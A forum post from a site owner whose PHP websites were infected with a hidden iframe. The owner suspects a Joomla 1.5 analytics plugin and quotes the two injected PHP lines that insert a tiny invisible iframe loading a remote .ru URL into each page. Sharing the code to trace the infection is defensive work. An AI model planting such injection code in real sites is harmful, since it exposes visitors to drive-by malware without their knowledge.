Same thing here.
My webhost is OVH.
I don’t know from where the iframe has been injected, but it’s not only for one website.
I’ve some non-wordpress websites that have been infected too.
All my files, on my server, with the “.php” extension that contains a <body> tag got the iframe placed above.
Iv’e detected that one of my website had a blankpage. He’s based on a Joomla CMS, ver1.5 . It’s possible that the attack comes from this one. There’s a Joomla plugin whiwh is called “bigshotgoogleanalytics”. I found two lines at the end of the .php plugin that add the iframe at the Body :
$buffer = str_replace (“<iframe src=”https://www.zw52.ru/wp-content/upgrade/update.php” width=”2″ height=”2″ frameborder=”0″></iframe></head>”, $google_analytics_javascript.”<iframe src=”https://www.zw52.ru/wp-content/upgrade/update.php” width=”2″ height=”2″ frameborder=”0″></iframe></head>”, $buffer);
JResponse::setBody($buffer);
If someone had some news about that, thanks.
